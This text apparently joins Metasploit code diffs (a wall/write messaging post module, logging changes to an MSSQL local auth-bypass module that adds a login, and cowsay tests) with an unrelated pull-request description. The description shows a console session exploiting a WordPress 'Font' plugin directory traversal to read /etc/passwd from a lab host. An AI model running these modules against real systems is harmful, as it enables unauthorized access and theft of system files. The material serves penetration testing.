     # cowsay(1) chunks a message up into 39-byte chunks and wraps it in '| ' and ' |'
     # Rex::Text.wordwrap(text, 0, 39, ' |', '| ') almost does this, but won't
     # split a word that has > 39 characters in it which results in oddly formed
-    # text in the cowsay banner, so just do it by hand
+    # text in the cowsay banner, so just do it by hand.  This big mess wraps
+    # the provided text in an ASCII-cloud and then makes it look like the cloud
+    # is a thought/word coming from the ASCII-cow.  Each line in the
+    # ASCII-cloud is no more than 34-characters long, and the cloud corners are
+    # made to look rounded
     text_lines = text.scan(/.{1,34}/)
     max_length = text_lines.map(&:size).sort.last
     cloud_parts = []

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -1,0 +1,48 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Write Messages to Users',
+        'Description'   => %q{
+          This module utilizes the wall(1) or write(1) utilities, as appropriate,
+          to send messages to users on the target system.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
+        # TODO: is there a way to do this on Windows?
+        'Platform'      => %w(linux osx unix),
+        'SessionTypes'  => %w(shell meterpreter)
+      )
+    )
+    register_options(
+      [
+        OptString.new('MESSAGE', [true, 'The message to send']),
+        OptString.new('USERS', [false, 'List of users to write(1) to, separated by commas. ' \
+                      ' wall(1)s to all users by default'])
+      ], self.class)
+  end
+
+  def users
+    datastore['USERS'] ? datastore['USERS'].split(/\s*,\s*/) : nil
+  end
+
+  def message
+    datastore['MESSAGE'] ? datastore['MESSAGE'] : "Hello metasploit session #{session.id}, the time is #{Time.now}"
+  end
+
+  def run
+    if users
+      users.map { |user| cmd_exec("echo '#{message}' | write #{user}") }
+    else
+      cmd_exec("echo '#{message}' | wall")
+    end
+  end
+end

--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Post
     instance = datastore['INSTANCE'].to_s
 
     # Display target
-    print_status("Running module against #{sysinfo['Computer']}")
+    print_status("#{session_display_info}: Running module against #{sysinfo['Computer']}")
 
     # Identify available native SQL client
     get_sql_client
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Post
       service = check_for_sqlserver(instance)
       fail_with(Failure::Unknown, 'Unable to identify MSSQL Service') unless service
 
-      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
+      print_status("#{session_display_info}: Identified service '#{service[:display]}', PID: #{service[:pid]}")
       instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
 
       if datastore['REMOVE_LOGIN']
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Post
   end
 
   def add_sql_login(dbuser, dbpass, instance)
-    print_status("Attempting to add new login \"#{dbuser}\"...")
+    print_status("#{session_display_info}: Attempting to add new login \"#{dbuser}\"...")
     query = mssql_sa_escalation(username: dbuser, password: dbpass)
 
     # Get Data
@@ -117,33 +117,33 @@ class Metasploit3 < Msf::Post
 
     case add_login_result
     when '', /new login created/i
-      print_good("Successfully added login \"#{dbuser}\" with password \"#{dbpass}\"")
+      print_good("#{session_display_info}: Successfully added login \"#{dbuser}\" with password \"#{dbpass}\"")
       return true
     when /already exists/i
       fail_with(Failure::BadConfig, "Unable to add login #{dbuser}, user already exists")
     when /password validation failed/i
       fail_with(Failure::BadConfig, "Unable to add login #{dbuser}, password does not meet complexity requirements")
     else
-      print_error("Unable to add login #{dbuser}")
-      print_error("Database Error:\n #{add_login_result}")
+      print_error("#{session_display_info}: Unable to add login #{dbuser}")
+      print_error("#{session_display_info}: Database Error:\n #{add_login_result}")
       return false
     end
   end
 
   def remove_sql_login(dbuser, instance_name)
-    print_status("Attempting to remove login \"#{dbuser}\"")
+    print_status("#{session_display_info}: Attempting to remove login \"#{dbuser}\"")
     query = "sp_droplogin '#{dbuser}'"
 
     remove_login_result = run_sql(query, instance_name)
 
     # Display result
     if remove_login_result.empty?
-      print_good("Successfully removed login \"#{dbuser}\"")
+      print_good("#{session_display_info}: Successfully removed login \"#{dbuser}\"")
       return true
     else
       # Fail
-      print_error("Unabled to remove login #{dbuser}")
-      print_error("Database Error:\n\n #{remove_login_result}")
+      print_error("#{session_display_info}: Unabled to remove login #{dbuser}")
+      print_error("#{session_display_info}: Database Error:\n\n #{remove_login_result}")
       return false
     end
   end

--- a/spec/lib/rex/text_spec.rb
+++ b/spec/lib/rex/text_spec.rb
@@ -167,6 +167,61 @@ describe Rex::Text do
       end
     end
 
+    context ".cowsay" do
+
+      def moo(num)
+        (%w(moo) * num).join(' ')
+      end
+
+      it "should cowsay single lines correctly" do
+        cowsaid = <<EOCOW
+ _____________________
+< moo moo moo moo moo >
+ ---------------------
+       \\   ,__,
+        \\  (oo)____
+           (__)    )\\
+              ||--|| *
+EOCOW
+        described_class.cowsay(moo(5)).should eq(cowsaid)
+      end
+
+      it "should cowsay two lines correctly" do
+        cowsaid = <<EOCOW
+ _____________________________________
+/ moo moo moo moo moo moo moo moo moo \\
+\\  moo moo moo moo moo moo            /
+ -------------------------------------
+       \\   ,__,
+        \\  (oo)____
+           (__)    )\\
+              ||--|| *
+EOCOW
+        described_class.cowsay(moo(15)).should eq(cowsaid)
+      end
+
+      it "should cowsay three+ lines correctly" do
+        cowsaid = <<EOCOW
+ _____________________________________
+/ moo moo moo moo moo moo moo moo moo \\
+|  moo moo moo moo moo moo moo moo mo |
+| o moo moo moo moo moo moo moo moo m |
+\\ oo moo moo moo                      /
+ -------------------------------------
+       \\   ,__,
+        \\  (oo)____
+           (__)    )\\
+              ||--|| *
+EOCOW
+        described_class.cowsay(moo(30)).should eq(cowsaid)
+      end
+
+      it "should respect the wrap" do
+        wrap = 40 + rand(100)
+        cowsaid = described_class.cowsay(moo(1000), wrap)
+        max_len = cowsaid.split(/\n/).map(&:length).sort.last
+        max_len.should eq(wrap)
+      end
+    end
   end
 end
-


### PR DESCRIPTION
#### Add WordPress Plugin Font Auth File Read Vulnerability.

  Application: WordPress Plugin 'Font' 7.4
  Homepage: https://wordpress.org/plugins/font/
  Source Code: https://downloads.wordpress.org/plugin/font.7.4.zip
  Active Installs (wordpress.org): 40,000+
  References: https://wpvulndb.com/vulnerabilities/8214
#### Vulnerable packages*

  7.4
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf>  use auxiliary/scanner/http/wp_font_file_read 
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  info

       Name: WordPress Font File Read Vulnerability
     Module: auxiliary/scanner/http/wp_font_file_read
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  David Moore
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  FILEPATH     /etc/passwd      yes       The path to the file to read
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target address range or CIDR identifier
  RPORT        80               yes       The target port
  TARGETURI    /                yes       The base path to the wordpress application
  THREADS      1                yes       The number of concurrent threads
  VHOST                         no        HTTP server virtual host
  WP_PASSWORD                   yes       Valid password for the provided username
  WP_USERNAME                   yes       A valid username

Description:
  This module exploits an authenticated directory traversal 
  vulnerability in WordPress Plugin "Font" version 7.4, allowing to 
  read arbitrary files with the web server privileges.

References:
  https://wpvulndb.com/vulnerabilities/8214
  http://cvedetails.com/cve/2015-7683/
  https://packetstormsecurity.com/files/133930

msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  show options 

Module options (auxiliary/scanner/http/wp_font_file_read):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILEPATH     /etc/passwd      yes       The path to the file to read
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   THREADS      1                yes       The number of concurrent threads
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USERNAME                   yes       A valid username

msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  set RHOSTS 192.168.0.14
RHOSTS => 192.168.0.14
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  set WP_USERNAME espreto
WP_USERNAME => espreto
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  set WP_PASSWORD P@ssW0rd
WP_PASSWORD => P@ssW0rd
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  check 
[*] 192.168.0.14:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  run

[+] 192.168.0.14:80 - File saved in: /home/espreto/.msf4/loot/20151016145513_default_192.168.0.14_font.traversal_156212.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  head /home/espreto/.msf4/loot/20151016145513_default_192.168.0.14_font.traversal_156212.txt
[*] exec: head /home/espreto/.msf4/loot/20151016145513_default_192.168.0.14_font.traversal_156212.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  set VERBOSE true
VERBOSE => true
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  run

[*] 192.168.0.14:80 - Trying to login as: espreto
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
espreto:x:1000:1000:espreto,,,:/home/espreto:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
postgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:116:126:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
logstash:x:998:998:LogStash Service User:/var/lib/logstash:/usr/sbin/nologin
elasticsearch:x:118:128::/usr/share/elasticsearch:/bin/false

[+] 192.168.0.14:80 - File saved in: /home/espreto/.msf4/loot/20151016145526_default_192.168.0.14_font.traversal_825907.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  set FILEPATH /etc/issue
FILEPATH => /etc/issue
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read)  run

[*] 192.168.0.14:80 - Trying to login as: espreto
Ubuntu 12.04.5 LTS \n \l


[+] 192.168.0.14:80 - File saved in: /home/espreto/.msf4/loot/20151016145535_default_192.168.0.14_font.traversal_117437.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> auxiliary(wp_font_file_read) 
```
